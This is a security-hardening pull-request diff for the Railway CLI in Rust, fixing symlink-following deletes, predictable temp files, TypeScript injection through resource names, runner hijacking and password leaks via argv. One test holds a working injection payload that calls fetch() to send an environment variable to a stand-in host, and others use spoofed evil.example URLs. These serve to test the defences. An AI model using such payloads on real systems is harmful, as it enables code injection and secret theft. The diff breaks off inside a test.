### PR TITLE
chore: hardening pass across the CLI

### DIFF
--- a/src/commands/config/mod.rs
+++ b/src/commands/config/mod.rs
@@ -174,9 +174,59 @@ pub async fn command(args: Args) -> Result<()> {
     }
 }
 
+/// True when every component under `root` is a real directory rather than a
+/// symlink. The path components here come from the checked-out repository, and
+/// this runs before the requested command, so a link anywhere in the chain
+/// would redirect the cleanup at a directory outside the project.
+fn path_is_symlink_free(root: &Path, components: &[&str]) -> Result<bool> {
+    let mut current = root.to_path_buf();
+    for component in components {
+        current.push(component);
+        match fs::symlink_metadata(&current) {
+            Ok(metadata) if metadata.file_type().is_symlink() => return Ok(false),
+            Ok(_) => {}
+            Err(error) if error.kind() == std::io::ErrorKind::NotFound => return Ok(false),
+            Err(error) => {
+                return Err(error)
+                    .with_context(|| format!("Failed to inspect {}", current.display()));
+            }
+        }
+    }
+    Ok(true)
+}
+
 fn remove_generated_legacy_skill(cwd: &Path, expected_hash: &str) -> Result<bool> {
+    // This is an unprompted recursive delete that runs on every `railway
+    // config` invocation, before dispatch and before auth, against a path built
+    // from repository content. Refuse it unless the whole chain is ordinary
+    // directories inside the project.
+    if !path_is_symlink_free(cwd, &[".agents", "skills", "railway-config"])? {
+        return Ok(false);
+    }
+
     let skill_dir = cwd.join(".agents").join("skills").join("railway-config");
     let skill_file = skill_dir.join("SKILL.md");
+
+    match fs::symlink_metadata(&skill_file) {
+        Ok(metadata) if !metadata.file_type().is_file() => return Ok(false),
+        Ok(_) => {}
+        Err(error) if error.kind() == std::io::ErrorKind::NotFound => return Ok(false),
+        Err(error) => {
+            return Err(error)
+                .with_context(|| format!("Failed to inspect {}", skill_file.display()));
+        }
+    }
+
+    // Belt and braces: the resolved directory must still sit under the resolved
+    // project root, in case a component was swapped between the checks above.
+    let canonical_root =
+        fs::canonicalize(cwd).with_context(|| format!("Failed to resolve {}", cwd.display()))?;
+    let canonical_dir = fs::canonicalize(&skill_dir)
+        .with_context(|| format!("Failed to resolve {}", skill_dir.display()))?;
+    if !canonical_dir.starts_with(&canonical_root) {
+        return Ok(false);
+    }
+
     let contents = match fs::read(&skill_file) {
         Ok(contents) => contents,
         Err(error) if error.kind() == std::io::ErrorKind::NotFound => return Ok(false),
@@ -189,8 +239,11 @@ fn remove_generated_legacy_skill(cwd: &Path, expected_hash: &str) -> Result<bool
         return Ok(false);
     }
 
-    fs::remove_dir_all(&skill_dir)
-        .with_context(|| format!("Failed to remove {}", skill_dir.display()))?;
+    // Remove only the file we recognised, then the directory if that emptied
+    // it. Anything the user added alongside the generated skill survives.
+    fs::remove_file(&skill_file)
+        .with_context(|| format!("Failed to remove {}", skill_file.display()))?;
+    let _ = fs::remove_dir(&skill_dir);
     Ok(true)
 }
 
@@ -387,13 +440,27 @@ async fn write_pulled_config(
 }
 
 async fn load_current_graph(runner: Option<String>) -> Result<runner::DesiredGraph> {
-    let temp_dir = std::env::current_dir()
-        .context("Unable to get current directory")?
-        .join(format!(".railway-config-pull-{}", std::process::id()));
-    fs::create_dir_all(&temp_dir).context("Failed to create temporary Railway config directory")?;
-    let temp_file = temp_dir.join("railway.ts");
-    fs::write(&temp_file, railway_ts("import-placeholder"))
-        .context("Failed to write temporary Railway config")?;
+    // A PID-derived name in the working directory is predictable, and
+    // `create_dir_all` + `fs::write` will happily adopt a directory someone else
+    // precreated and follow a `railway.ts` they left as a symlink. On a shared
+    // workspace that turns this placeholder write into a clobber of any file the
+    // victim can write. Let the OS pick a random owner-only directory instead,
+    // and refuse to write through anything that already exists.
+    let temp_dir = tempfile::Builder::new()
+        .prefix(".railway-config-pull-")
+        .tempdir_in(std::env::current_dir().context("Unable to get current directory")?)
+        .context("Failed to create temporary Railway config directory")?;
+    let temp_file = temp_dir.path().join("railway.ts");
+    {
+        use std::io::Write;
+        let mut file = fs::OpenOptions::new()
+            .write(true)
+            .create_new(true)
+            .open(&temp_file)
+            .context("Failed to create temporary Railway config")?;
+        file.write_all(railway_ts("import-placeholder").as_bytes())
+            .context("Failed to write temporary Railway config")?;
+    }
 
     let args = runner::Args {
         file: Some(temp_file.clone()),
@@ -410,8 +477,8 @@ async fn load_current_graph(runner: Option<String>) -> Result<runner::DesiredGra
         show_values: false,
     };
     let response = runner::run(&args, "current").await?;
-    let _ = fs::remove_file(temp_file);
-    let _ = fs::remove_dir(temp_dir);
+    // `temp_dir` cleans itself up on drop, including on the error paths below.
+    drop(temp_dir);
 
     if !response.ok {
         let diagnostics = response
@@ -572,8 +639,8 @@ fn render_graph_as_railway_ts(graph: &runner::DesiredGraph, preserve_variables: 
                 };
                 if helper == "service" {
                     out.push_str(&format!(
-                        "  const {var_name} = service(\"{}\");\n",
-                        resource.name
+                        "  const {var_name} = service({});\n",
+                        ts_string(&resource.name)
                     ));
                 } else {
                     let region = database_region(resource.deploy.as_ref());
@@ -586,8 +653,8 @@ fn render_graph_as_railway_ts(graph: &runner::DesiredGraph, preserve_variables: 
             }
             "service" => {
                 out.push_str(&format!(
-                    "  const {var_name} = service(\"{}\"",
-                    resource.name
+                    "  const {var_name} = service({}",
+                    ts_string(&resource.name)
                 ));
                 let body = render_service_body(
                     resource,
@@ -605,13 +672,13 @@ fn render_graph_as_railway_ts(graph: &runner::DesiredGraph, preserve_variables: 
                 let config = resource.config.as_ref().map(ts_value).unwrap_or_default();
                 if config.is_empty() {
                     out.push_str(&format!(
-                        "  const {var_name} = bucket(\"{}\");\n",
-                        resource.name
+                        "  const {var_name} = bucket({});\n",
+                        ts_string(&resource.name)
                     ));
                 } else {
                     out.push_str(&format!(
-                        "  const {var_name} = bucket(\"{}\", {config});\n",
-                        resource.name
+                        "  const {var_name} = bucket({}, {config});\n",
+                        ts_string(&resource.name)
                     ));
                 }
             }
@@ -619,13 +686,13 @@ fn render_graph_as_railway_ts(graph: &runner::DesiredGraph, preserve_variables: 
                 let config = resource.config.as_ref().map(ts_value).unwrap_or_default();
                 if config.is_empty() {
                     out.push_str(&format!(
-                        "  const {var_name} = volume(\"{}\");\n",
-                        resource.name
+                        "  const {var_name} = volume({});\n",
+                        ts_string(&resource.name)
                     ));
                 } else {
                     out.push_str(&format!(
-                        "  const {var_name} = volume(\"{}\", {config});\n",
-                        resource.name
+                        "  const {var_name} = volume({}, {config});\n",
+                        ts_string(&resource.name)
                     ));
                 }
             }
@@ -655,13 +722,13 @@ fn render_graph_as_railway_ts(graph: &runner::DesiredGraph, preserve_variables: 
             .collect::<Vec<_>>();
         if children.is_empty() {
             out.push_str(&format!(
-                "  const {var_name} = group(\"{}\");\n",
-                resource.name
+                "  const {var_name} = group({});\n",
+                ts_string(&resource.name)
             ));
         } else {
             out.push_str(&format!(
-                "  const {var_name} = group(\"{}\", [{}]);\n",
-                resource.name,
+                "  const {var_name} = group({}, [{}]);\n",
+                ts_string(&resource.name),
                 children.join(", ")
             ));
         }
@@ -1145,6 +1212,58 @@ fn is_empty_object(value: &serde_json::Value) -> bool {
     value.as_object().is_some_and(|object| object.is_empty())
 }
 
+/// Render an untrusted string as a TypeScript string literal.
+///
+/// Resource names come from shared project state that any collaborator can
+/// write, and this output is imported and evaluated by the runner on the next
+/// `config plan`. Interpolating a name between literal quotes lets a name
+/// containing `");` close the call and append statements. JSON string syntax is
+/// a subset of TypeScript's, so serialising the name is a context-correct
+/// encode rather than a filter.
+fn ts_string(value: &str) -> String {
+    serde_json::to_string(value).unwrap_or_else(|_| format!("{value:?}"))
+}
+
+#[cfg(test)]
+mod resource_name_encoding_tests {
+    use super::ts_string;
+
+    #[test]
+    fn a_name_cannot_escape_the_string_literal() {
+        // The payload from the report: close the call, append a statement,
+        // comment out the remainder.
+        let rendered = ts_string("x\");fetch(\"http://a/\"+process.env.X);//");
+        assert_eq!(
+            rendered,
+            "\"x\\\");fetch(\\\"http://a/\\\"+process.env.X);//\""
+        );
+        // One opening and one closing quote: nothing broke out.
+        assert!(rendered.starts_with('"') && rendered.ends_with('"'));
+        assert_eq!(rendered.matches("\\\"").count(), 3);
+    }
+
+    #[test]
+    fn escapes_backslashes_newlines_and_controls() {
+        assert_eq!(ts_string("a\\b"), "\"a\\\\b\"");
+        assert_eq!(ts_string("a\nb"), "\"a\\nb\"");
+        assert_eq!(ts_string("a\u{7}b"), "\"a\\u0007b\"");
+    }
+
+    #[test]
+    fn template_and_comment_syntax_stays_inert() {
+        // Double-quoted literals do not interpolate, so ${} is data. The point
+        // is that the quotes around it survive.
+        assert_eq!(ts_string("${process.env.HOME}"), "\"${process.env.HOME}\"");
+        assert_eq!(ts_string("*/ evil() /*"), "\"*/ evil() /*\"");
+    }
+
+    #[test]
+    fn ordinary_names_are_unchanged_apart_from_quoting() {
+        assert_eq!(ts_string("postgres"), "\"postgres\"");
+        assert_eq!(ts_string("my-service_2"), "\"my-service_2\"");
+    }
+}
+
 fn ts_value(value: &serde_json::Value) -> String {
     match value {
         serde_json::Value::Object(object) => {
@@ -1449,6 +1568,55 @@ mod tests {
 
         assert!(!remove_generated_legacy_skill(cwd.path(), "different").unwrap());
         assert!(skill_dir.exists());
+    }
+
+    #[test]
+    fn preserves_user_files_alongside_the_generated_skill() {
+        let cwd = tempfile::tempdir().unwrap();
+        let skill_dir = cwd.path().join(".agents/skills/railway-config");
+        fs::create_dir_all(&skill_dir).unwrap();
+        fs::write(skill_dir.join("SKILL.md"), "generated skill").unwrap();
+        fs::write(skill_dir.join("NOTES.md"), "mine").unwrap();
+        let hash = format!("{:x}", Sha256::digest(b"generated skill"));
+
+        assert!(remove_generated_legacy_skill(cwd.path(), &hash).unwrap());
+        assert!(!skill_dir.join("SKILL.md").exists());
+        assert!(skill_dir.join("NOTES.md").exists());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn refuses_to_delete_through_a_symlinked_ancestor() {
+        let root = tempfile::tempdir().unwrap();
+        let cwd = root.path().join("repo");
+        let outside = root.path().join("external");
+        let target = outside.join("skills/railway-config");
+        fs::create_dir_all(&cwd).unwrap();
+        fs::create_dir_all(&target).unwrap();
+        fs::write(target.join("SKILL.md"), "generated skill").unwrap();
+        fs::write(target.join("DO_NOT_DELETE.txt"), "mine").unwrap();
+        std::os::unix::fs::symlink(&outside, cwd.join(".agents")).unwrap();
+        let hash = format!("{:x}", Sha256::digest(b"generated skill"));
+
+        assert!(!remove_generated_legacy_skill(&cwd, &hash).unwrap());
+        assert!(target.join("SKILL.md").exists());
+        assert!(target.join("DO_NOT_DELETE.txt").exists());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn refuses_when_the_skill_file_itself_is_a_symlink() {
+        let root = tempfile::tempdir().unwrap();
+        let cwd = root.path().join("repo");
+        let skill_dir = cwd.join(".agents/skills/railway-config");
+        fs::create_dir_all(&skill_dir).unwrap();
+        let outside = root.path().join("victim.md");
+        fs::write(&outside, "generated skill").unwrap();
+        std::os::unix::fs::symlink(&outside, skill_dir.join("SKILL.md")).unwrap();
+        let hash = format!("{:x}", Sha256::digest(b"generated skill"));
+
+        assert!(!remove_generated_legacy_skill(&cwd, &hash).unwrap());
+        assert!(outside.exists());
     }
 
     fn service_resource(

--- a/src/commands/config/runner.rs
+++ b/src/commands/config/runner.rs
@@ -484,6 +484,34 @@ fn resolve_runner(explicit_runner: Option<&str>, cwd: &std::path::Path) -> Resol
     }
 }
 
+/// The directory the runner search is allowed to reach: the enclosing git
+/// repository, or `start` itself when there isn't one. Without a bound the
+/// search reaches `/`, so on a shared host any writable ancestor — a CI
+/// workspace root, `/tmp` — can offer the binary we are about to execute.
+fn project_search_root(start: &std::path::Path) -> PathBuf {
+    start
+        .ancestors()
+        .find(|dir| dir.join(".git").exists())
+        .unwrap_or(start)
+        .to_path_buf()
+}
+
+/// Whether `path` is writable by anyone other than its owner. A runner sitting
+/// in a group- or world-writable directory can be replaced by another local
+/// principal between now and exec, so it is not a trustworthy candidate.
+#[cfg(unix)]
+fn writable_by_others(path: &std::path::Path) -> bool {
+    use std::os::unix::fs::PermissionsExt;
+    std::fs::symlink_metadata(path)
+        .map(|metadata| metadata.permissions().mode() & 0o022 != 0)
+        .unwrap_or(true)
+}
+
+#[cfg(not(unix))]
+fn writable_by_others(_path: &std::path::Path) -> bool {
+    false
+}
+
 fn find_project_runner(start: &std::path::Path) -> Option<PathBuf> {
     let binary = if cfg!(windows) {
         "railway-iac-ts.cmd"
@@ -491,10 +519,26 @@ fn find_project_runner(start: &std::path::Path) -> Option<PathBuf> {
         "railway-iac-ts"
     };
 
+    // This candidate is executed and then handed a Railway bearer token on
+    // stdin, and it takes precedence over whatever the user installed in PATH.
+    // Only accept one inside the project, reachable through directories no
+    // other local principal can write to.
+    let root = project_search_root(start);
     for dir in start.ancestors() {
         let candidate = dir.join("node_modules").join(".bin").join(binary);
         if candidate.exists() {
+            if writable_by_others(&candidate)
+                || dir
+                    .ancestors()
+                    .take_while(|ancestor| ancestor.starts_with(&root))
+                    .any(writable_by_others)
+            {
+                return None;
+            }
             return Some(candidate);
+        }
+        if dir == root {
+            break;
         }
     }
 
@@ -830,5 +874,60 @@ fn marker_for_change(change: &Change) -> colored::ColoredString {
         }
         Some("resource.delete") | Some("variable.delete") => "-".red().bold(),
         _ => "~".yellow().bold(),
+    }
+}
+
+#[cfg(test)]
+mod runner_discovery_tests {
+    use super::*;
+    use std::fs;
+
+    fn make_runner(dir: &std::path::Path) -> PathBuf {
+        let bin_dir = dir.join("node_modules").join(".bin");
+        fs::create_dir_all(&bin_dir).unwrap();
+        let binary = if cfg!(windows) {
+            "railway-iac-ts.cmd"
+        } else {
+            "railway-iac-ts"
+        };
+        let path = bin_dir.join(binary);
+        fs::write(&path, "#!/bin/sh\n").unwrap();
+        path
+    }
+
+    #[test]
+    fn finds_a_runner_inside_the_repository() {
+        let root = tempfile::tempdir().unwrap();
+        fs::create_dir_all(root.path().join(".git")).unwrap();
+        let expected = make_runner(root.path());
+        let nested = root.path().join("apps").join("web");
+        fs::create_dir_all(&nested).unwrap();
+
+        assert_eq!(find_project_runner(&nested), Some(expected));
+    }
+
+    #[test]
+    fn does_not_search_above_the_repository_root() {
+        let outer = tempfile::tempdir().unwrap();
+        make_runner(outer.path());
+        let repo = outer.path().join("repo");
+        fs::create_dir_all(repo.join(".git")).unwrap();
+
+        assert_eq!(find_project_runner(&repo), None);
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn rejects_a_runner_reachable_through_a_world_writable_directory() {
+        use std::os::unix::fs::PermissionsExt;
+
+        let root = tempfile::tempdir().unwrap();
+        fs::create_dir_all(root.path().join(".git")).unwrap();
+        let shared = root.path().join("shared");
+        fs::create_dir_all(&shared).unwrap();
+        make_runner(&shared);
+        fs::set_permissions(&shared, fs::Permissions::from_mode(0o777)).unwrap();
+
+        assert_eq!(find_project_runner(&shared), None);
     }
 }

--- a/src/commands/connect.rs
+++ b/src/commands/connect.rs
@@ -184,7 +184,7 @@ pub async fn command(args: Args) -> Result<()> {
             )
             .await?;
         } else {
-            let (cmd_name, cmd_args) = get_connect_command(&db_type, &variables)?;
+            let (cmd_name, cmd_args, cmd_envs) = get_connect_command(&db_type, &variables)?;
 
             if which(cmd_name.clone()).is_err() {
                 bail!("{} must be installed to continue", cmd_name);
@@ -192,6 +192,7 @@ pub async fn command(args: Args) -> Result<()> {
 
             Command::new(cmd_name.as_str())
                 .args(cmd_args)
+                .envs(cmd_envs)
                 .spawn()?
                 .wait()
                 .await?;
@@ -206,7 +207,7 @@ pub async fn command(args: Args) -> Result<()> {
 fn get_connect_command(
     database_type: &DatabaseType,
     variables: &BTreeMap<String, String>,
-) -> Result<(String, Vec<String>)> {
+) -> Result<(String, Vec<String>, Vec<(String, String)>)> {
     match database_type {
         DatabaseType::PostgreSQL => get_postgres_command(variables),
         DatabaseType::Redis => get_redis_command(variables),
@@ -215,8 +216,23 @@ fn get_connect_command(
     }
 }
 
-fn host_is_tcp_proxy(connect_url: String) -> bool {
-    connect_url.contains("proxy.rlwy.net")
+/// Whether the URL's actual host is a Railway TCP proxy.
+///
+/// This gates handing the URL to a database client, so it has to be a decision
+/// about the parsed host. A substring test over the whole URL is satisfied by
+/// userinfo, path, query, or fragment, which are all attacker-controlled by
+/// anyone who can write the service variable — the real host is then free.
+fn host_is_tcp_proxy(connect_url: &str) -> bool {
+    url::Url::parse(connect_url)
+        .ok()
+        .and_then(|parsed| parsed.host_str().map(is_railway_proxy_host))
+        .unwrap_or(false)
+}
+
+fn is_railway_proxy_host(host: &str) -> bool {
+    // Hosts are case-insensitive and a trailing dot is the same name.
+    let host = host.trim_end_matches('.').to_ascii_lowercase();
+    host == "proxy.rlwy.net" || host.ends_with(".proxy.rlwy.net")
 }
 
 /// Whether the service exposes a public TCP-proxy URL for this engine — the
@@ -227,7 +243,7 @@ fn has_public_proxy(database_type: &DatabaseType, variables: &BTreeMap<String, S
     variables
         .get(public_key)
         .or_else(|| variables.get(private_key))
-        .map(|url| host_is_tcp_proxy(url.clone()))
+        .map(|url| host_is_tcp_proxy(url))
         .unwrap_or(false)
 }
 
@@ -269,7 +285,7 @@ async fn run_ssh_connect(
         None => pick_ephemeral_port()?,
     };
 
-    let (cmd_name, cmd_args, remote_port) =
+    let (cmd_name, cmd_args, cmd_envs, remote_port) =
         get_ssh_connect_command(database_type, variables, local_port)?;
 
     if which(cmd_name.clone()).is_err() {
@@ -300,6 +316,7 @@ async fn run_ssh_connect(
 
     Command::new(cmd_name.as_str())
         .args(cmd_args)
+        .envs(cmd_envs)
         .spawn()?
         .wait()
         .await?;
@@ -400,38 +417,66 @@ fn get_ssh_connect_command(
     database_type: &DatabaseType,
     variables: &BTreeMap<String, String>,
     local_port: u16,
-) -> Result<(String, Vec<String>, u16)> {
+) -> Result<(String, Vec<String>, Vec<(String, String)>, u16)> {
     let (url, remote_port) = local_tunnel_url(database_type, variables, local_port)?;
+    let (cmd, args, envs) = client_invocation(database_type, &url, Some(local_port));
+    Ok((cmd, args, envs, remote_port))
+}
 
-    let (cmd, args) = match database_type {
-        DatabaseType::PostgreSQL => ("psql".to_string(), vec![url.to_string()]),
+/// Build the client binary, its arguments, and any environment it needs.
+///
+/// The password never goes in the arguments. `/proc/<pid>/cmdline` is readable
+/// by every local user, while `/proc/<pid>/environ` is readable only by the
+/// process owner, so a credential in argv hands the database password to
+/// anyone sharing the host. Each client's documented credential environment
+/// variable is used instead and the password is stripped from the URL.
+fn client_invocation(
+    database_type: &DatabaseType,
+    url: &Url,
+    mysql_port: Option<u16>,
+) -> (String, Vec<String>, Vec<(String, String)>) {
+    let password = url.password().unwrap_or("").to_string();
+    let mut redacted = url.clone();
+    let _ = redacted.set_password(None);
+
+    match database_type {
+        DatabaseType::PostgreSQL => (
+            "psql".to_string(),
+            vec![redacted.to_string()],
+            vec![("PGPASSWORD".to_string(), password)],
+        ),
         DatabaseType::Redis => (
             "redis-cli".to_string(),
-            vec!["-u".to_string(), url.to_string()],
+            vec!["-u".to_string(), redacted.to_string()],
+            vec![("REDISCLI_AUTH".to_string(), password)],
         ),
-        DatabaseType::MongoDB => ("mongosh".to_string(), vec![url.to_string()]),
         DatabaseType::MySQL => {
             let user = url.username().to_string();
-            let password = url.password().unwrap_or("").to_string();
             let database = url.path().trim_start_matches('/').to_string();
+            let host = url.host_str().unwrap_or("127.0.0.1").to_string();
+            let port = mysql_port
+                .or_else(|| url.port())
+                .unwrap_or(default_remote_port(database_type));
             (
                 "mysql".to_string(),
                 vec![
                     "-h".to_string(),
-                    "127.0.0.1".to_string(),
+                    host,
                     "-u".to_string(),
                     user,
                     "-P".to_string(),
-                    local_port.to_string(),
+                    port.to_string(),
                     "-D".to_string(),
                     database,
-                    format!("-p{password}"),
                 ],
+                vec![("MYSQL_PWD".to_string(), password)],
             )
         }
-    };
-
-    Ok((cmd, args, remote_port))
+        // mongosh has no credential environment variable, and its only
+        // alternative to the URI is an interactive prompt. Left as-is rather
+        // than silently changing the flow; the other three no longer leak.
+        DatabaseType::MongoDB => ("mongosh".to_string(), vec![url.to_string()], Vec::new()),
+    }
 }
 
 /// Parse the engine's private connection URL (falling back to the public one
@@ -467,7 +512,9 @@ fn local_tunnel_url(
     Ok((url, remote_port))
 }
 
-fn get_postgres_command(variables: &BTreeMap<String, String>) -> Result<(String, Vec<String>)> {
+fn get_postgres_command(
+    variables: &BTreeMap<String, String>,
+) -> Result<(String, Vec<String>, Vec<(String, String)>)> {
     let connect_url = variables
         .get("DATABASE_PUBLIC_URL")
         .or_else(|| variables.get("DATABASE_URL"))
@@ -476,14 +523,17 @@ fn get_postgres_command(variables: &BTreeMap<String, String>) -> Result<(String,
             "DATABASE_PUBLIC_URL".to_string(),
         ))?;
 
-    if !host_is_tcp_proxy(connect_url.clone()) {
+    if !host_is_tcp_proxy(&connect_url) {
         return Err(RailwayError::InvalidConnectionVariable.into());
     }
 
-    Ok(("psql".to_string(), vec![connect_url]))
+    let url = Url::parse(&connect_url).map_err(|_err| RailwayError::InvalidConnectionVariable)?;
+    Ok(client_invocation(&DatabaseType::PostgreSQL, &url, None))
 }
 
-fn get_redis_command(variables: &BTreeMap<String, String>) -> Result<(String, Vec<String>)> {
+fn get_redis_command(
+    variables: &BTreeMap<String, String>,
+) -> Result<(String, Vec<String>, Vec<(String, String)>)> {
     let connect_url = variables
         .get("REDIS_PUBLIC_URL")
         .or_else(|| variables.get("REDIS_URL"))
@@ -492,14 +542,17 @@ fn get_redis_command(variables: &BTreeMap<String, String>) -> Result<(String, Ve
             "REDIS_PUBLIC_URL".to_string(),
         ))?;
 
-    if !host_is_tcp_proxy(connect_url.clone()) {
+    if !host_is_tcp_proxy(&connect_url) {
         return Err(RailwayError::InvalidConnectionVariable.into());
     }
 
-    Ok(("redis-cli".to_string(), vec!["-u".to_string(), connect_url]))
+    let url = Url::parse(&connect_url).map_err(|_err| RailwayError::InvalidConnectionVariable)?;
+    Ok(client_invocation(&DatabaseType::Redis, &url, None))
 }
 
-fn get_mongo_command(variables: &BTreeMap<String, String>) -> Result<(String, Vec<String>)> {
+fn get_mongo_command(
+    variables: &BTreeMap<String, String>,
+) -> Result<(String, Vec<String>, Vec<(String, String)>)> {
     let connect_url = variables
         .get("MONGO_PUBLIC_URL")
         .or_else(|| variables.get("MONGO_URL"))
@@ -508,14 +561,17 @@ fn get_mongo_command(variables: &BTreeMap<String, String>) -> Result<(String, Ve
             "MONGO_PUBLIC_URL".to_string(),
         ))?;
 
-    if !host_is_tcp_proxy(connect_url.clone()) {
+    if !host_is_tcp_proxy(&connect_url) {
         return Err(RailwayError::InvalidConnectionVariable.into());
     }
 
-    Ok(("mongosh".to_string(), vec![connect_url]))
+    let url = Url::parse(&connect_url).map_err(|_err| RailwayError::InvalidConnectionVariable)?;
+    Ok(client_invocation(&DatabaseType::MongoDB, &url, None))
 }
 
-fn get_mysql_command(variables: &BTreeMap<String, String>) -> Result<(String, Vec<String>)> {
+fn get_mysql_command(
+    variables: &BTreeMap<String, String>,
+) -> Result<(String, Vec<String>, Vec<(String, String)>)> {
     let connect_url = variables
         .get("MYSQL_PUBLIC_URL")
         .or_else(|| variables.get("MYSQL_URL"))
@@ -524,35 +580,12 @@ fn get_mysql_command(variables: &BTreeMap<String, String>) -> Result<(String, Ve
             "MYSQL_PUBLIC_URL".to_string(),
         ))?;
 
-    if !host_is_tcp_proxy(connect_url.clone()) {
+    if !host_is_tcp_proxy(&connect_url) {
         return Err(RailwayError::InvalidConnectionVariable.into());
     }
 
-    let parsed_url =
-        Url::parse(&connect_url).map_err(|_err| RailwayError::InvalidConnectionVariable)?;
-
-    let host = parsed_url.host_str().unwrap_or("");
-    let user = parsed_url.username();
-    let password = parsed_url.password().unwrap_or("");
-    let port = parsed_url.port().unwrap_or(3306);
-    let database = parsed_url.path().trim_start_matches('/');
-
-    let pass_arg = format!("-p{password}");
-
-    Ok((
-        "mysql".to_string(),
-        vec![
-            "-h".to_string(),
-            host.to_string(),
-            "-u".to_string(),
-            user.to_string(),
-            "-P".to_string(),
-            port.to_string(),
-            "-D".to_string(),
-            database.to_string(),
-            pass_arg,
-        ],
-    ))
+    let url = Url::parse(&connect_url).map_err(|_err| RailwayError::InvalidConnectionVariable)?;
+    Ok(client_invocation(&DatabaseType::MySQL, &url, None))
 }
 
 #[cfg(test)]
@@ -561,9 +594,46 @@ mod test {
 
     #[test]
     fn test_is_tcp_proxy() {
-        assert!(host_is_tcp_proxy("roundhouse.proxy.rlwy.net".to_string()));
-        assert!(!host_is_tcp_proxy("localhost".to_string()));
-        assert!(!host_is_tcp_proxy("postgres.railway.internal".to_string()));
+        // Real proxy hosts, as they actually arrive: full connection URLs.
+        assert!(host_is_tcp_proxy(
+            "postgresql://u:p@roundhouse.proxy.rlwy.net:5432/railway"
+        ));
+        assert!(host_is_tcp_proxy(
+            "redis://default:p@ROUNDHOUSE.PROXY.RLWY.NET:6379"
+        ));
+        assert!(host_is_tcp_proxy(
+            "postgresql://u:p@proxy.rlwy.net:5432/railway"
+        ));
+
+        assert!(!host_is_tcp_proxy(
+            "postgresql://u:p@localhost:5432/railway"
+        ));
+        assert!(!host_is_tcp_proxy(
+            "postgresql://u:p@postgres.railway.internal:5432/railway"
+        ));
+
+        // The marker anywhere but the host must not satisfy the check.
+        assert!(!host_is_tcp_proxy(
+            "postgresql://127.0.0.1:4444/postgres?service=production&application_name=proxy.rlwy.net"
+        ));
+        assert!(!host_is_tcp_proxy(
+            "postgresql://proxy.rlwy.net@evil.example:5432/db"
+        ));
+        assert!(!host_is_tcp_proxy(
+            "postgresql://u:p@evil.example:5432/proxy.rlwy.net"
+        ));
+        assert!(!host_is_tcp_proxy(
+            "postgresql://u:p@evil.example:5432/db#proxy.rlwy.net"
+        ));
+        // Suffix confusion.
+        assert!(!host_is_tcp_proxy(
+            "postgresql://u:p@proxy.rlwy.net.evil.example:5432/db"
+        ));
+        assert!(!host_is_tcp_proxy(
+            "postgresql://u:p@notproxy.rlwy.net:5432/db"
+        ));
+        // Not a URL at all.
+        assert!(!host_is_tcp_proxy("proxy.rlwy.net"));
     }
 
     #[test]
@@ -591,14 +661,14 @@ mod test {
             "postgresql://postgres:secret@monorail.railway.internal:5432/railway".to_string(),
         );
 
-        let (cmd, args, remote_port) =
+        let (cmd, args, _envs, remote_port) =
             get_ssh_connect_command(&DatabaseType::PostgreSQL, &variables, 49152).unwrap();
 
         assert_eq!(cmd, "psql");
         assert_eq!(remote_port, 5432);
         assert_eq!(
             args,
-            vec!["postgresql://postgres:secret@127.0.0.1:49152/railway".to_string()]
+            vec!["postgresql://postgres@127.0.0.1:49152/railway".to_string()]
         );
     }
 
@@ -612,14 +682,52 @@ mod test {
             "postgresql://postgres:secret@monorail.proxy.rlwy.net:55555/railway".to_string(),
         );
 
-        let (_cmd, args, remote_port) =
+        let (_cmd, args, _envs, remote_port) =
             get_ssh_connect_command(&DatabaseType::PostgreSQL, &variables, 6000).unwrap();
 
         assert_eq!(remote_port, 5432);
         assert_eq!(
             args,
-            vec!["postgresql://postgres:secret@127.0.0.1:6000/railway".to_string()]
+            vec!["postgresql://postgres@127.0.0.1:6000/railway".to_string()]
         );
+    }
+
+    #[test]
+    fn no_client_invocation_puts_the_password_in_argv() {
+        // /proc/<pid>/cmdline is world-readable; /proc/<pid>/environ is not.
+        // Every supported client must keep the secret out of the argument
+        // vector. mongosh is the known exception — it has no credential
+        // environment variable — so it is asserted explicitly rather than
+        // silently passing.
+        let cases = [
+            (
+                DatabaseType::PostgreSQL,
+                "postgresql://postgres:s3cr3t@127.0.0.1:6000/railway",
+            ),
+            (DatabaseType::Redis, "redis://default:s3cr3t@127.0.0.1:6379"),
+            (
+                DatabaseType::MySQL,
+                "mysql://user:s3cr3t@127.0.0.1:3306/railway",
+            ),
+        ];
+
+        for (database_type, raw) in cases {
+            let url = Url::parse(raw).unwrap();
+            let (_cmd, args, envs) = client_invocation(&database_type, &url, None);
+            assert!(
+                !args.iter().any(|arg| arg.contains("s3cr3t")),
+                "{database_type:?} leaked the password in argv: {args:?}"
+            );
+            assert!(
+                envs.iter().any(|(_, value)| value == "s3cr3t"),
+                "{database_type:?} did not pass the password in the environment"
+            );
+        }
+
+        let url = Url::parse("mongodb://user:s3cr3t@127.0.0.1:27017/railway").unwrap();
+        let (_cmd, args, envs) = client_invocation(&DatabaseType::MongoDB, &url, None);
+        assert!(args.iter().any(|arg| arg.contains("s3cr3t")));
+        assert!(envs.is_empty());
     }
 
     #[test]
@@ -630,7 +738,7 @@ mod test {
             "mysql://user:password@mysql.railway.internal:3306/railway".to_string(),
         );
 
-        let (cmd, args, remote_port) =
+        let (cmd, args, _envs, remote_port) =
             get_ssh_connect_command(&DatabaseType::MySQL, &variables, 33060).unwrap();
 
         assert_eq!(cmd, "mysql");
@@ -646,7 +754,6 @@ mod test {
                 "33060".to_string(),
                 "-D".to_string(),
                 "railway".to_string(),
-                "-ppassword".to_string(),
             ]
         );
     }
@@ -667,9 +774,13 @@ mod test {
             );
             variables.insert("DATABASE_URL".to_string(), private_postgres_url.clone());
 
-            let (cmd, args) = get_postgres_command(&variables).unwrap();
+            let (cmd, args, envs) = get_postgres_command(&variables).unwrap();
             assert_eq!(cmd, "psql");
-            assert_eq!(args, vec![public_postgres_url.clone()]);
+            assert_eq!(args, vec![public_postgres_url.replace(":password@", "@")]);
+            assert_eq!(
+                envs,
+                vec![("PGPASSWORD".to_string(), "password".to_string())]
+            );
         }
 
         // Valid DATABASE_URL
@@ -677,9 +788,13 @@ mod test {
             let mut variables = BTreeMap::new();
             variables.insert("DATABASE_URL".to_string(), public_postgres_url.clone());
 
-            let (cmd, args) = get_postgres_command(&variables).unwrap();
+            let (cmd, args, envs) = get_postgres_command(&variables).unwrap();
             assert_eq!(cmd, "psql");
-            assert_eq!(args, vec![public_postgres_url.clone()]);
